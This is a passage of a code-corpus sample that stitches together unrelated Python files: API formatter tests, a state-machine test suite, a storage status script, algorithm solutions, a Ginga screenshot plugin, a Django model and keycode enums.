    def test_format_data(self, parsed_pred_api_v10_predictions, batch,
                         opts, expected_fields, expected_values):
        """format_data emits the expected header fields and row values."""
        fields, values = pred_api_v10.format_data(
            parsed_pred_api_v10_predictions, batch, **opts)
        assert fields == expected_fields
        assert values == expected_values

    @pytest.mark.parametrize('opts', [
        {'pred_name': None,
         'pred_threshold_name': 'threshold',
         'keep_cols': None,
         'skip_row_id': False,
         'fast_mode': False,
         'delimiter': ','},
    ])
    def test_fail_threshold_on_non_binary_classification(
            self, parsed_pred_api_v10_predictions_regression,
            batch, opts):
        """Requesting a threshold column on regression output must raise."""
        with pytest.raises(NoPredictionThresholdInResult):
            pred_api_v10.format_data(
                parsed_pred_api_v10_predictions_regression, batch, **opts)
class TestApiV1Handlers(object):
    """Tests for the legacy api/v1 response handlers."""

    def test_unpack_data(self):
        """unpack_data parses the v1 payload into (dict, exec_time, elapsed)."""
        result = api_v1.unpack_data({
            'elapsed': 0.123,
            'text': '''
            {"status": "",
             "model_id": "598b07d8100d2b4b0cd39224",
             "code": 200,
             "execution_time": 10,
             "predictions": [
                {
                    "row_id": 0,
                    "class_probabilities":{"0.0":0.4,"1.0":0.6},
                    "prediction":1.0
                },
                {
                    "row_id": 1,
                    "class_probabilities":{"0.0":0.4,"1.0":0.6},
                    "prediction":1.0
                }
             ]}
            ''',
            'headers': {
                'X-DataRobot-Model-Cache-Hit': 'true'
            }
        })
        assert type(result) is tuple
        data, exec_time, elapsed = result
        assert type(data) is dict
        assert set(data.keys()) == {
            'status', 'model_id', 'code', 'execution_time', 'predictions'}
        assert elapsed == 0.123
        assert exec_time == 10

    @pytest.mark.parametrize('opts, expected_fields, expected_values', (
        ({'pred_name': None,
          'keep_cols': None,
          'skip_row_id': False,
          'fast_mode': False,
          'delimiter': ','},
         ['row_id', '0.0', '1.0'],
         [[0, 0.4, 0.6], [1, 0.6, 0.4]]),
        ({'pred_name': None,
          'keep_cols': ['gender'],
          'skip_row_id': False,
          'fast_mode': False,
          'delimiter': ','},
         ['row_id', 'gender', '0.0', '1.0'],
         [[0, 'Male', 0.4, 0.6], [1, 'Male', 0.6, 0.4]]),
        ({'pred_name': None,
          'keep_cols': ['gender'],
          'skip_row_id': True,
          'fast_mode': False,
          'delimiter': ','},
         ['gender', '0.0', '1.0'],
         [['Male', 0.4, 0.6], ['Male', 0.6, 0.4]]),
    ))
    def test_format_data(self, parsed_api_v1_predictions, batch,
                         opts, expected_fields, expected_values):
        """format_data emits class-probability columns plus any kept columns."""
        fields, values = api_v1.format_data(
            parsed_api_v1_predictions, batch, **opts)
        assert fields == expected_fields
        assert values == expected_values

    @pytest.mark.parametrize('opts', [
        {'pred_name': None,
         'keep_cols': ['age'],
         'skip_row_id': False,
         'fast_mode': True,
         'delimiter': ','}
    ])
    def test_fail_on_quoted_newline_in_fast_mode(self,
                                                 parsed_api_v1_predictions,
                                                 fast_batch_quoted_newline,
                                                 opts):
        """Fast mode cannot re-split rows broken by a quoted newline."""
        with pytest.raises(UnexpectedKeptColumnCount):
            api_v1.format_data(parsed_api_v1_predictions,
                               fast_batch_quoted_newline, **opts)

    @pytest.mark.parametrize('opts', [
        {'pred_name': None,
         'keep_cols': ['age'],
         'skip_row_id': False,
         'fast_mode': True,
         'delimiter': ','}
    ])
    def test_fail_on_quoted_comma_in_fast_mode(self, parsed_api_v1_predictions,
                                               fast_batch_with_quoted_comma,
                                               opts):
        """Fast mode miscounts kept columns when a field has a quoted comma."""
        with pytest.raises(UnexpectedKeptColumnCount):
            api_v1.format_data(parsed_api_v1_predictions,
                               fast_batch_with_quoted_comma, **opts)
| StarcoderdataPython |
213759 | from time import sleep
from SillyStateMachine import SillyStateMachine
def check_list(correct_list, actual_list):
    """Assert that actual_list matches correct_list element by element.

    Compares with zip(), which covers every expected element present in both
    lists — the original ``range(0, len(correct_list) - 1)`` loop skipped the
    final expected element (off-by-one) and could IndexError on a short
    actual_list.  zip() also stops safely at the shorter list.
    """
    for expected, actual in zip(correct_list, actual_list):
        assert expected == actual
class BasicStateMachine(SillyStateMachine):
    """Minimal concrete machine used to exercise SillyStateMachine in tests."""

    def init_setup(self):
        # Status before start() has ever been called.
        self.status = "I haven't started yet!"
        self.States = {
            "Start": self._start_state,
            "State 1": self._state_1,
            "State 2": self._state_2,
            "State 3": self._state_3,
            "Idle": self._idle,
        }
        self.interrupted = False
        self.state_list = []
        self.ret_list = []

    def interrupt(self):
        # Record each tick: which state is scheduled next and the previous
        # state's return value (when there was one).
        self.interrupted = True
        self.state_list.append(self.next_state)
        if self.prev_ret is not None:
            self.ret_list.append(self.prev_ret)

    def stop_actions(self):
        self.status = "Stopped!"

    def reset_actions(self):
        self.status = "Reset!"

    def _start_state(self):
        self.status = "I started!"
        self.period = 0.002
        self.next_state = "Start"

    def _state_1(self, next=2):
        # States 2 and 3 ping-pong through State 1 via the `next` kwarg.
        self.period = 0
        self.next_state = "State 2" if next == 2 else "State 3"

    def _state_2(self):
        self.kwargs = {"next": 3}
        self.next_state = "State 1"
        return 2

    def _state_3(self):
        self.kwargs = {"next": 2}
        self.next_state = "State 1"
        return 3
def test_basic_init():
    """A freshly constructed machine is stopped and parked on Start."""
    machine = BasicStateMachine()
    assert machine.status == "I haven't started yet!"
    assert machine.next_state == "Start"
    assert machine.period == 0
    assert machine.run_flag == False
    assert machine.isRunning() == False
def test_basic_start_stop():
    """start() enters the Start state (setting status/period); stop() halts."""
    machine = BasicStateMachine()
    machine.start()
    assert machine.isRunning() == True
    assert machine.getState() == "Start"
    assert machine.next_state == "Start"
    assert machine.status == "I started!"
    assert machine.period == 0.002
    assert machine.getPeriod() == 0.002
    machine.stop()
    assert machine.isRunning() == False
    assert machine.status == "Stopped!"
def test_basic_reset():
    """reset() stops the machine and returns it to the Start state."""
    machine = BasicStateMachine()
    machine.setState("State 1")
    machine.start()
    machine.reset()
    # Give the background machinery a moment to settle after reset.
    sleep(0.01)
    assert machine.isRunning() == False
    assert machine.getState() == "Start"
    assert machine.status == "Reset!"
def test_basic_interrupt():
    """interrupt() fires at least once within one period of running."""
    machine = BasicStateMachine()
    machine.start()
    sleep(machine.getPeriod())
    assert machine.interrupted == True
    machine.stop()
    assert machine.isRunning() == False
def test_basic_kwargs_ret():
    """States ping-pong 1→2→1→3 via kwargs; return values alternate 2, 3."""
    machine = BasicStateMachine()
    machine.setState("State 1")
    machine.start()
    sleep(0.05)
    machine.stop()
    # Expected prefix of the visited-state trace recorded by interrupt().
    correct_call_list = [
        "State 1",
        "State 2",
        "State 1",
        "State 3",
        "State 1",
        "State 2",
        "State 1",
        "State 3",
        "State 1",
        "State 2",
        "State 1",
        "State 3",
        "State 1",
        "State 2",
        "State 1",
        "State 3",
    ]
    actual_call_list = machine.state_list
    check_list(correct_call_list, actual_call_list)
    # Expected prefix of the return-value trace (State 2 -> 2, State 3 -> 3).
    correct_ret_list = [
        2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3, 2, 3,
    ]
    actual_ret_list = machine.ret_list
    check_list(correct_ret_list, actual_ret_list)
| StarcoderdataPython |
6500016 | <reponame>sppautomation/sppclient
# Script to check the status of vSnap provider(s) in SPP
# Use registervsnap.py -h for help
import json
import logging
from optparse import OptionParser
import sys
import spplib.sdk.client as client
# Root logger configuration: emit INFO-level messages from this script.
logging.basicConfig()
logger = logging.getLogger('logger')
logger.setLevel(logging.INFO)

# Command-line interface: SPP credentials and the target host URL.
parser = OptionParser()
parser.add_option("--user", dest="username", help="SPP Username")
parser.add_option("--pass", dest="password", help="SPP Password")
parser.add_option("--host", dest="host", help="SPP Host, (ex. https://172.20.49.49)")
(options, args) = parser.parse_args()
def prettyprint(indata):
    """Pretty-print a JSON-serialisable object to stdout with sorted keys."""
    formatted = json.dumps(indata, sort_keys=True, indent=4, separators=(',', ': '))
    print(formatted)
def validate_input():
    """Exit with status 2 unless username, password and host were all given."""
    required = (options.username, options.password, options.host)
    if any(value is None for value in required):
        print("Invalid input, use -h switch for help")
        sys.exit(2)
def get_vsnap_status():
    """Print the initialisation status of every registered vSnap provider.

    Queries the 'corestorage' endpoint on the global session; exits with
    status 2 (after logging out) when no providers are registered.
    """
    try:
        storages = client.SppAPI(session, 'corestorage').get()['storages']
        if not storages:
            print("No vSnap storage providers found")
            session.logout()
            sys.exit(2)
        for storage in storages:
            if storage['type'] == "vsnap":
                print("vSnap provider " + storage['name'] + " is " + storage['initializeStatus'])
    except Exception:
        # The original bare ``except:`` also swallowed the SystemExit raised
        # by the sys.exit(2) branch above (and Ctrl-C).  Catching Exception
        # lets those propagate while still reporting API/connection errors.
        print("Error connecting to SPP host")
# Script entry point: validate CLI args, authenticate, report, clean up.
validate_input()
session = client.SppSession(options.host, options.username, options.password)
session.login()
get_vsnap_status()
session.logout()
| StarcoderdataPython |
3561839 | <reponame>longwangjhu/LeetCode<gh_stars>1-10
# https://leetcode.com/problems/subtree-of-another-tree/
# Given the roots of two binary trees root and subRoot, return true if there is a
# subtree of root with the same structure and node values of subRoot and false
# otherwise.
# A subtree of a binary tree tree is a tree that consists of a node in tree and
# all of this node's descendants. The tree tree could also be considered as a
# subtree of itself.
################################################################################
# get preorder, use l_None and r_None
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def isSubtree(self, s: "TreeNode", t: "TreeNode") -> bool:
        """Return True if some node of `s` roots a subtree identical to `t`.

        Annotations are quoted (forward references) so the class can be
        imported even where TreeNode is defined elsewhere.  The original
        also contained an unreachable preorder-string comparison after this
        return statement; that dead code has been removed.
        """
        return self.has_subtree(s, t)

    def preorder(self, node, is_left):
        """Serialise a tree in preorder with explicit left/right null markers.

        NOTE: not used by isSubtree (it was only reachable from the dead
        code mentioned above); kept for backward compatibility.
        """
        if not node:
            return 'l_None' if is_left else "r_None"
        return "#" + str(node.val) + " " \
            + self.preorder(node.left, True) + " " \
            + self.preorder(node.right, False)

    # treat every node in s as root, compare with t
    def has_subtree(self, s, t):
        """Try every node of `s` as a candidate root and compare against `t`."""
        if s is None:
            return False
        return self.is_same(s, t) \
            or self.has_subtree(s.left, t) \
            or self.has_subtree(s.right, t)

    def is_same(self, s, t):
        """Return True if the trees rooted at `s` and `t` are identical."""
        if s is None and t is None: return True  # both are None
        if s is None or t is None: return False  # only one is None
        return s.val == t.val \
            and self.is_same(s.left, t.left) \
            and self.is_same(s.right, t.right)
| StarcoderdataPython |
157905 | <reponame>cvahid/threatconnect-playbooks
# -*- coding: utf-8 -*-
"""ThreatConnect Playbook App"""
# Import default Playbook Class (Required)
from playbook_app import PlaybookApp
class App(PlaybookApp):
    """Playbook App"""

    def run(self):
        """Run the App main logic.

        This method should contain the core logic of the App.
        """
        action = self.tcex.playbook.read(self.args.action)
        domain = self.tcex.playbook.read(self.args.domain)
        if action == 'decode':
            # NOTE(review): 'decode' here maps the Unicode form to its
            # ASCII/Punycode form via the idna codec, and 'encode' does the
            # reverse — this looks inverted relative to common IDNA
            # terminology.  Confirm the intended direction against the
            # App's install.json before changing behavior.
            self.updated_domain = domain.encode('idna').decode('utf-8')
        elif action == 'encode':
            self.updated_domain = domain.encode('utf-8').decode('idna')
        self.exit_message = '{} has been {}ed to {}'.format(domain, action, self.updated_domain)

    def write_output(self):
        """Write the Playbook output variables.

        This method should be overridden with the output variables defined in the install.json
        configuration file.
        """
        self.tcex.log.info('Writing Output')
        action = self.tcex.playbook.read(self.args.action)
        if action == 'decode':
            self.tcex.playbook.create_output('decodedDomain', self.updated_domain)
        else:
            self.tcex.playbook.create_output('encodedDomain', self.updated_domain)
| StarcoderdataPython |
352682 | <gh_stars>10-100
""""""
"""
==============
Binary Search
==============
TIme Complexity
Worst Case : O( log(n) )
Average Case : O( log(n) )
Best Case : O(1)
Space Complexity : O(1)
Binary Search is a sorting algorithm in which we select the mid element and compare key to the mid element if key is
smaller then we search before mid else after mid. If key is found we return the index of key else -1.
"""
import sys
class BinarySearch:
    """Iterative binary search over a sorted sequence."""

    def binary_search(self, array, key):
        """Return an index of key in the sorted array, or -1 if absent."""
        lo, hi = 0, len(array) - 1
        while lo <= hi:
            middle = lo + (hi - lo) // 2
            probe = array[middle]
            if probe == key:
                return middle
            if probe < key:
                lo = middle + 1
            else:
                hi = middle - 1
        return -1
if __name__ == "__main__":
    print(
        """
        ==============
        Binary Search
        ==============
        Input Format
        first line contains space separated sorted elements eg., 1 2 3 4 5 6 7 8 9
        Second line contains the key to be searched eg., 7
        """
    )
    # Read all whitespace-separated integers from stdin: everything but the
    # last is the sorted array, the last is the search key.  Renamed from
    # `input` to avoid shadowing the builtin of the same name.
    raw = sys.stdin.read()
    data = list(map(int, raw.split()))
    array = data[:-1]
    key = data[-1]
    res = BinarySearch().binary_search(array, key)
    if res == -1:
        print("Key not found")
    else:
        # Reported index is 1-based for display.
        print("Key : '{}' found at index : {}".format(key, res + 1))
| StarcoderdataPython |
1625203 | from asynctest import TestCase as AsyncTestCase, mock as async_mock
from aries_cloudagent.indy.sdk.profile import IndySdkProfile
from ....askar.profile import AskarProfileManager
from ....config.injection_context import InjectionContext
from ....core.in_memory import InMemoryProfile
from ....indy.sdk.wallet_setup import IndyOpenWallet, IndyWalletConfig
from ....ledger.base import BaseLedger
from ....ledger.indy import IndySdkLedgerPool, IndySdkLedger
from ..base_manager import MultipleLedgerManagerError
from ..manager_provider import MultiIndyLedgerManagerProvider
# Genesis transaction fixture for a single-node (Node1) Indy test ledger;
# used as the pool bootstrap data in the ledger configurations below.
TEST_GENESIS_TXN = {
    "reqSignature": {},
    "txn": {
        "data": {
            "data": {
                "alias": "Node1",
                "blskey": "<KEY>",
                "blskey_pop": "<KEY>",
                "client_ip": "192.168.65.3",
                "client_port": 9702,
                "node_ip": "192.168.65.3",
                "node_port": 9701,
                "services": ["VALIDATOR"],
            },
            "dest": "Gw6pDLhcBcoQesN72qfotTgFa7cbuqZpkX3Xo6pLhPhv",
        },
        "metadata": {"from": "Th7MpTaRZVRYnPiabds81Y"},
        "type": "0",
    },
    "txnMetadata": {
        "seqNo": 1,
        "txnId": "fea82e10e894419fe2bea7d96296a6d46f50f93f9eeda954ec461b2ed2950b62",
    },
    "ver": "1",
}

# Two-ledger configuration: a production write ledger and a non-production
# test ledger, both bootstrapped from the same genesis transaction.
LEDGER_CONFIG = [
    {
        "id": "sovrinStaging",
        "is_production": True,
        "is_write": True,
        "genesis_transactions": TEST_GENESIS_TXN,
    },
    {
        "id": "sovrinTest",
        "is_production": False,
        "genesis_transactions": TEST_GENESIS_TXN,
    },
]
class TestMultiIndyLedgerManagerProvider(AsyncTestCase):
    """provide() should return the manager matching the profile backend type."""

    async def test_provide_invalid_manager(self):
        """An InMemoryProfile maps to no multi-ledger manager and must raise."""
        profile = InMemoryProfile.test_profile()
        provider = MultiIndyLedgerManagerProvider(profile)
        context = InjectionContext()
        context.settings["ledger.ledger_config_list"] = LEDGER_CONFIG
        with self.assertRaises(MultipleLedgerManagerError):
            provider.provide(context.settings, context.injector)

    async def test_provide_indy_manager(self):
        """An IndySdkProfile yields a MultiIndyLedgerManager."""
        context = InjectionContext()
        profile = IndySdkProfile(
            IndyOpenWallet(
                config=IndyWalletConfig({"name": "test-profile"}),
                created=True,
                handle=1,
                master_secret_id="master-secret",
            ),
            context,
        )
        context.injector.bind_instance(
            BaseLedger, IndySdkLedger(IndySdkLedgerPool("name"), profile)
        )
        provider = MultiIndyLedgerManagerProvider(profile)
        context.settings["ledger.ledger_config_list"] = LEDGER_CONFIG
        context.settings["ledger.genesis_transactions"] = TEST_GENESIS_TXN
        self.assertEqual(
            provider.provide(context.settings, context.injector).__class__.__name__,
            "MultiIndyLedgerManager",
        )

    async def test_provide_askar_manager(self):
        """An Askar-provisioned profile yields a MultiIndyVDRLedgerManager."""
        context = InjectionContext()
        profile = await AskarProfileManager().provision(
            context,
            {
                # "auto_recreate": True,
                # "auto_remove": True,
                "name": ":memory:",
                "key": await AskarProfileManager.generate_store_key(),
                "key_derivation_method": "RAW",  # much faster than using argon-hashed keys
            },
        )
        context.injector.bind_instance(
            BaseLedger, IndySdkLedger(IndySdkLedgerPool("name"), profile)
        )
        provider = MultiIndyLedgerManagerProvider(profile)
        context.settings["ledger.ledger_config_list"] = LEDGER_CONFIG
        context.settings["ledger.genesis_transactions"] = TEST_GENESIS_TXN
        self.assertEqual(
            provider.provide(context.settings, context.injector).__class__.__name__,
            "MultiIndyVDRLedgerManager",
        )
| StarcoderdataPython |
290135 | #!/usr/bin/env python3
########################################################################################################################
##### INFORMATION ######################################################################################################
### @PROJECT_NAME: SPLAT: Speech Processing and Linguistic Analysis Tool ###
### @VERSION_NUMBER: ###
### @PROJECT_SITE: github.com/meyersbs/SPLAT ###
### @AUTHOR_NAME: <NAME> ###
### @CONTACT_EMAIL: <EMAIL> ###
### @LICENSE_TYPE: MIT ###
########################################################################################################################
########################################################################################################################
"""
This package contains the following files:
[01] POSTagger.py
Provides the functionality to tokenize the given input with punctuation as separate tokens, and then does
a dictionary lookup to determine the part-of-speech for each token.
""" | StarcoderdataPython |
1609790 | # -*- coding:utf-8 -*-
"""
@author: leonardo
@created time: 2020-11-03
@last modified time:2020-11-03
"""
from sqlalchemy import create_engine,event
import numpy as np
def get_connection(database_name):
    """Create a SQLAlchemy engine for *database_name* on the fixed MySQL host.

    :param database_name: schema name to connect to
    :return: a SQLAlchemy Engine (connections are opened lazily)
    """
    # NOTE(review): host and credentials are hard-coded; consider moving them
    # to configuration or environment variables.
    return create_engine('mysql+pymysql://root:yangxh@192.168.127.12:3306/{}?charset=utf8'.format(database_name))
def add_own_encoders(conn, cursor, query, *args):
    """'before_cursor_execute' hook: teach PyMySQL how to encode numpy scalars.

    Registers converters so np.float64 / np.int32 parameters are sent as
    plain Python float / int instead of raising an encoding error.
    """
    cursor.connection.encoders[np.float64] = lambda value, encoders: float(value)
    cursor.connection.encoders[np.int32] = lambda value, encoders: int(value)
def enable_np_encoder(engine):
    """Make PyMySQL accept np.float64 (and np.int32) parameters on *engine*.

    :param engine: SQLAlchemy Engine to attach the encoder hook to
    :return: None
    """
    event.listen(engine, "before_cursor_execute", add_own_encoders)
3331804 | <filename>__main__.py
#!/usr/bin/env python
# import sys
import footmark
#from footmark.ecs.connection import ECSConnection
def main():
    """Print a greeting to stdout."""
    # print(...) with parentheses is valid in both Python 2 and Python 3;
    # the original bare `print "..."` statement is a syntax error on Python 3.
    print("Hello World!")

if __name__ == "__main__":
    main()
    print("This is main Program")
    #app=ECSConnection()
    #app.run()
| StarcoderdataPython |
6586771 | # This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
"""
Capture PNG or JPEG images of the channel viewer image.
**Usage**
1. Select the RGB graphics type for the snap from the "Type" combo box.
2. Press "Snap" when you have the channel image the way you want to capture it.
A copy of the RGB image will be loaded into the ``ScreenShot`` viewer.
You can pan and zoom within the ``ScreenShot`` viewer like a normal Ginga
viewer to examine detail (e.g., see the magnified difference between
JPEG and PNG formats).
3. Repeat (1) and (2) until you have the image you want.
4. Enter a valid path for a new file into the "Folder" text box.
5. Enter a valid name for a new file into the "Name" text box.
There is no need to add the file extension; it will be added, if needed.
6. Press the "Save" button. The file will be saved where you specified.
**Notes**
* PNG offers less artifacts for overlaid graphics, but files are larger
than JPEG.
* The "Center" button will center the snap image; "Fit" will set the
zoom to fit it to the window; and "Clear" will clear the image.
* Press "1" in the screenshot viewer to zoom to 100% pixels.
"""
import os.path
import shutil
import tempfile
from ginga import GingaPlugin
from ginga.RGBImage import RGBImage
from ginga.gw import Widgets, Viewers
__all__ = ['ScreenShot']
class ScreenShot(GingaPlugin.LocalPlugin):
    """Local plugin that captures the channel viewer image as PNG/JPEG."""

    def __init__(self, fv, fitsimage):
        # superclass defines some variables for us, like logger
        super(ScreenShot, self).__init__(fv, fitsimage)

        self.tosave_type = 'png'      # format selected for the next snap
        self.saved_type = None        # format of the last snap taken (None until first snap)
        self.savetypes = ('png', 'jpeg')
        # temp file the snap is written to before the user saves it
        self.tmpname = os.path.join(tempfile.tempdir, "__snap")
        self.save_path = ''
        self.save_name = ''

        self._wd = 200
        self._ht = 200

    def build_gui(self, container):
        """Construct the plugin UI: snapshot viewer, controls and save box."""
        vbox = Widgets.VBox()
        vbox.set_border_width(4)
        vbox.set_spacing(2)

        vbox1 = Widgets.VBox()

        # Uncomment to debug; passing parent logger generates too
        # much noise in the main logger
        #zi = Viewers.CanvasView(logger=self.logger)
        zi = Viewers.CanvasView(logger=None)
        zi.set_desired_size(self._wd, self._ht)
        zi.enable_autozoom('once')
        zi.enable_autocuts('once')
        zi.enable_autocenter('once')
        zi.set_zoom_algorithm('step')
        zi.cut_levels(0, 255)
        # flip Y so the RGB snapshot displays right side up
        zi.transform(False, True, False)
        #zi.set_scale_limits(0.001, 1000.0)
        zi.set_bg(0.4, 0.4, 0.4)
        zi.set_color_map('gray')
        zi.set_intensity_map('ramp')
        # for debugging
        zi.set_name('scrnimage')
        self.scrnimage = zi

        bd = zi.get_bindings()
        bd.enable_zoom(True)
        bd.enable_pan(True)
        bd.enable_cmap(False)
        zi.show_mode_indicator(True)

        iw = Viewers.ScrolledView(zi)
        iw.resize(self._wd, self._ht)
        vbox1.add_widget(iw, stretch=1)

        captions = (('Type:', 'label', 'grtype', 'combobox',
                     'Snap', 'button'),
                    ('Clear', 'button', 'Center', 'button', 'Fit', 'button',
                     'Full', 'button'),
                    )
        w, b = Widgets.build_info(captions, orientation='vertical')
        self.w = b

        combobox = b.grtype
        for name in self.savetypes:
            combobox.append_text(name)
        index = self.savetypes.index(self.tosave_type)
        combobox.set_index(index)
        combobox.add_callback('activated', lambda w, idx: self.set_type(idx))
        combobox.set_tooltip("Set the format of the snap image")

        b.snap.set_tooltip(
            "Click to grab a snapshot of this channel viewer image")
        b.snap.add_callback('activated', self.snap_cb)
        b.clear.set_tooltip("Clear the snap image")
        b.clear.add_callback('activated', self.clear_cb)
        b.center.set_tooltip("Center the snap image")
        b.center.add_callback('activated', self.center_cb)
        b.fit.set_tooltip("Fit snap image to window")
        b.fit.add_callback('activated', self.fit_cb)
        b.full.set_tooltip("View at 100% (1:1)")
        b.full.add_callback('activated', self.full_cb)

        vbox1.add_widget(w, stretch=0)

        fr = Widgets.Frame("Screenshot")
        fr.set_widget(vbox1)

        vpaned = Widgets.Splitter(orientation='vertical')
        vpaned.add_widget(fr)
        vpaned.add_widget(Widgets.Label(''))

        vbox2 = Widgets.VBox()
        fr = Widgets.Frame("Save File")

        captions = (('Folder:', 'label', 'folder', 'entry'),
                    ('Name:', 'label', 'name', 'entry'),
                    ('Save', 'button'),
                    )
        w, b = Widgets.build_info(captions, orientation='vertical')
        self.w.update(b)
        b.folder.set_text(self.save_path)
        b.folder.set_tooltip("Set the folder path for the snap image")
        b.name.set_text(self.save_name)
        b.name.set_tooltip("Set the name for the snap image")
        b.save.set_tooltip("Click to save the last snap")
        b.save.add_callback('activated', self.save_cb)
        fr.set_widget(w)
        vbox2.add_widget(fr, stretch=0)

        # stretch
        spacer = Widgets.Label('')
        vbox2.add_widget(spacer, stretch=1)

        btns = Widgets.HBox()
        btns.set_spacing(3)

        btn = Widgets.Button("Close")
        btn.add_callback('activated', lambda w: self.close())
        btns.add_widget(btn, stretch=0)
        btn = Widgets.Button("Help")
        btn.add_callback('activated', lambda w: self.help())
        btns.add_widget(btn, stretch=0)
        btns.add_widget(Widgets.Label(''), stretch=1)

        vbox2.add_widget(btns, stretch=0)

        #vpaned.add_widget(vbox2)

        vbox.add_widget(vpaned, stretch=1)

        container.add_widget(vbox, stretch=1)
        container.add_widget(vbox2, stretch=0)

    def set_type(self, idx):
        """Combobox callback: remember the selected snapshot format."""
        self.tosave_type = self.savetypes[idx]
        return True

    def close(self):
        """Close this plugin instance."""
        self.fv.stop_local_plugin(self.chname, str(self))
        return True

    def start(self):
        pass

    def stop(self):
        # forget the last snap so a stale temp file is not saved later
        self.saved_type = None

    def snap_cb(self, w):
        """Snap the channel viewer to the temp file and display it."""
        format = self.tosave_type
        # snap image
        self.fv.error_wrap(self.fitsimage.save_rgb_image_as_file,
                           self.tmpname, format=format)
        self.saved_type = format
        img = RGBImage(logger=self.logger)
        img.load_file(self.tmpname)
        self.scrnimage.set_image(img)

    def save_cb(self, w):
        """Copy the last snapped temp file to the user-chosen folder/name."""
        format = self.saved_type
        if format is None:
            return self.fv.show_error("Please save an image first.")

        # create filename
        filename = self.w.name.get_text().strip()
        if len(filename) == 0:
            return self.fv.show_error("Please set a name for saving the file")
        self.save_name = filename
        if not filename.lower().endswith('.' + format):
            filename = filename + '.' + format

        # join to path
        path = self.w.folder.get_text().strip()
        if path == '':
            path = filename
        else:
            self.save_path = path
            path = os.path.join(path, filename)

        # copy last saved file
        self.fv.error_wrap(shutil.copyfile, self.tmpname, path)

    def center_cb(self, w):
        """Center the snapshot in the viewer."""
        self.scrnimage.center_image(no_reset=True)

    def fit_cb(self, w):
        """Zoom the snapshot to fit the viewer window."""
        self.scrnimage.zoom_fit(no_reset=True)

    def full_cb(self, w):
        """View the snapshot at 1:1 scale."""
        self.scrnimage.scale_to(1.0, 1.0, no_reset=True)

    def clear_cb(self, w):
        """Clear the snapshot viewer."""
        self.scrnimage.clear()

    def __str__(self):
        return 'screenshot'
# END
| StarcoderdataPython |
8085251 | import random
def chunk(list, n):
    """Breaks a list into chunks of size n (the last chunk may be shorter)."""
    chunks = []
    for start in range(0, len(list), n):
        chunks.append(list[start:start + n])
    return chunks
def balance_groups(groups):
    """Balances a list of lists in place so they are roughly equally sized.

    Groups smaller than the floor of the average size steal members (popped
    from the end) of groups that are larger than that floor.
    """
    total_players = sum(len(g) for g in groups)
    floor_size = int(total_players / len(groups))
    indexed = list(enumerate(groups))
    for idx, small in indexed:
        while len(small) < floor_size:
            for other_idx, donor in indexed:
                if idx != other_idx and len(donor) > floor_size:
                    small.append(donor.pop())
    return list(groups)
def make_groups(players, groupSize):
    """Makes even-ish groups of size groupSize and return an array of the players.

    Shuffles *players* in place first; a single player yields no groups.
    """
    random.shuffle(players)
    if len(players) == 1:
        return []
    parts = chunk(players, groupSize)
    return parts if len(parts) == 1 else balance_groups(parts)
| StarcoderdataPython |
8069498 | <reponame>mlbullett/mybigfatrussianwedding<filename>contactus/models.py
""" contactus/models.py """
from django.db import models
from django.utils.timezone import now
class Contact(models.Model):
    """Stores a single contact-form submission."""
    name = models.CharField(max_length=200)            # sender's display name
    from_email = models.EmailField(max_length=100)     # sender's reply address
    message = models.TextField()                       # free-form message body
    contact_date = models.DateTimeField(default=now)   # submission timestamp

    def __str__(self):
        return self.name
| StarcoderdataPython |
5197572 | <reponame>kosciak/ecs-rogal
import collections
import enum
import string
# Single-character key codes: every printable ASCII character except space.
ASCII_CHARS = set(
    string.digits
    + string.ascii_lowercase
    + string.ascii_uppercase
    + string.punctuation
)
class Modifier(enum.IntFlag):
    """Bit flags for keyboard modifier state; combine with ``|``."""
    NONE = 0
    SHIFT = 1
    CTRL = 2
    ALT = 4
    GUI = 8

    @classmethod
    def get(cls, name):
        """Return the member matching *name* (case-insensitive), or None."""
        return cls.__members__.get(name.upper())
# Max Unicode codepoint: 0x10ffff
# TODO: Maybe set keycodes of function keys to values above max unicode codepoint?
# This way we can easily map all single character keys, no matter what layout is used
class Keycode(enum.IntEnum):
    """Symbolic key codes.

    Printable ASCII keys use their ``ord()`` value; function, navigation and
    modifier keys use the X11 keysym values reported by xev (see comments).
    """
    UNKNOWN = 0

    BACKSPACE = ord('\b')
    TAB = ord('\t')
    RETURN = ord('\n')
    ENTER = RETURN
    ESCAPE = 27
    ESC = ESCAPE

    SPACE = ord(' ')

    # NOTE: For all printable ASCII characters use ord(char)
    EXCLAM = ord('!')
    QUOTEDBL = ord('"')
    HASH = ord('#')
    PERCENT = ord('%')
    DOLLAR = ord('$')
    AMPERSAND = ord('&')
    QUOTE = ord('\'')
    LEFTPAREN = ord('(')
    RIGHTPAREN = ord(')')
    ASTERISK = ord('*')
    PLUS = ord('+')
    COMMA = ord(',')
    MINUS = ord('-')
    PERIOD = ord('.')
    SLASH = ord('/')
    # 0 = 48
    # ...
    # 9 = 57
    COLON = ord(':')
    SEMICOLON = ord(';')
    LESS = ord('<')
    EQUALS = ord('=')
    GREATER = ord('>')
    QUESTION = ord('?')
    AT = ord('@')
    # A = 41
    # ...
    # Z = 90
    LEFTBRACKET = ord('[')
    BACKSLASH = ord('\\')
    RIGHTBRACKET = ord(']')
    CARET = ord('^')
    UNDERSCORE = ord('_')
    BACKQUOTE = ord('`')
    # a = 97
    # ...
    # z = 122
    LEFTBRACE = ord('{')
    PIPE = ord('|')
    RIGHTBRACE = ord('}')
    TILDE = ord('~')

    # As returned by xev
    F1 = 0xffbe
    F2 = 0xffbf
    F3 = 0xffc0
    F4 = 0xffc1
    F5 = 0xffc2
    F6 = 0xffc3
    F7 = 0xffc4
    F8 = 0xffc5
    F9 = 0xffc6
    F10 = 0xffc7
    F11 = 0xffc8
    F12 = 0xffc9

    # As returned by xev
    LEFT = 0xff51
    UP = 0xff52
    RIGHT = 0xff53
    DOWN = 0xff54

    INSERT = 0xff63
    DELETE = 127
    HOME = 0xff50
    END = 0xff57
    PAGE_UP = 0xff55
    PAGE_DOWN = 0xff56

    # For KP_* use 0xff00 + matching keycode from normal keyboard
    KP_0 = 0xff30
    KP_1 = 0xff31
    KP_2 = 0xff32
    KP_3 = 0xff33
    KP_4 = 0xff34
    KP_5 = 0xff35
    KP_6 = 0xff36
    KP_7 = 0xff37
    KP_8 = 0xff38
    KP_9 = 0xff39

    KP_DIVIDE = 0xff2f
    KP_MULTIPLY = 0xff2a
    KP_MINUS = 0xff2d
